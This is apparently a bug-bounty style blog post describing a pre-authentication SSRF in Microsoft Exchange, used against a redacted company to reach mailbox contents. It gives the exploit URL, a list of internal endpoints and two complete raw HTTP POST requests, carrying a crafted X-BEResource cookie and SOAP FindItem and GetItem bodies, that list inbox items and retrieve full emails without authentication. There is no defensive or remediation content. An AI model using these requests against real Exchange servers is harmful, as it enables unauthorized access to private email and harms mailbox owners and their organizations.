Pre-Auth SSRF To Full MailBox Access (Microsoft Exchange Server Exploit)

Recently, while testing one of the popular Indian company (for the sake of confidentiality lets call it redacted.com). I found out that on one of the subdomains, “Outlook” was running. Also there were other subdomains related to the same service.

“autodiscover.redacted.com”
“mail.redacted.com”
“legacy.redacted.com”

One of these subdomains was showing the “Exchange Server Page”. With the version information and other details like Username, SID etc.

This seems interesting, because i previously heard about “Exchange Server Exploits by Orange Tsai”

I was sure that vulnerable version of Exchange Server was running so, i read some blogs about this exploit to understand the Source Code Analysis and exploitation steps. Every Blog has different way to exploit this vulnerability, i combined my payloads from different resources.

It is an “Pre-auth SSRF TO RCE” But i was unable to get the RCE due to some reasons.

Resources:
https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Exploitation:

 https://autodiscover.redacted.com/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com

Note: To Understand how the SSRF is triggered, Read the Source-Code Analysis of Microsoft Exchange by PeterJson from one of the above mentioned blogs. The SSRF was discovered by Source-Code Analysis and Exploit URL is publicly available.

So far, SSRF GET Requests can be sent using the given URL.

Some other interesting internal endpoints:

/powershell
/mapi/emsmdb
/autodiscover/autodiscover.xml
/ews/exchange.asmx
/owa/auth/Current/
/ecp/default.flt
/ecp/favicon.ico

/ews/exchange.asmx can be used to access the emails.

The Valid XML formats and Official Documentation can be found at:

https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/finditem-operation

To read the Emails from Exchange Server, A request to “/ecp/favicon.ico” (non-ssrf) must be sent with “X-BEResource” Cookie Containing “Exchange Server Address” and SSRF Endpoint(/ews/exchange.asmx).

POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1128
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:FindItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ParentFolderIds>
<t:DistinguishedFolderId Id='inbox'>
<t:Mailbox>
<t:EmailAddress>info@redacted.com</t:EmailAddress>
</t:Mailbox>
</t:DistinguishedFolderId>
</m:ParentFolderIds>
</m:FindItem>
</soap:Body>
</soap:Envelope>

Email Details of the given address can be seen in response. It contains email, subject, date, attachments. but not the Conversation of the email.

To Read the Conversations ItemId and ChangeKey is required both of which can be found in the response of the above request.

Lastly, By crafting another request containing the ItemId and Changekey of the conversation we want to read, we can access the Full Email.

Payload used to retrieve individual emails without authentication.
POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1062
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:GetItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:ItemId Id="ItemID" ChangeKey="Changekey" />
</m:ItemIds>
</m:GetItem>
</soap:Body>
</soap:Envelope>

17 Y/o | OSCP | OSWE | Security Researcher | Twitter: VanshalG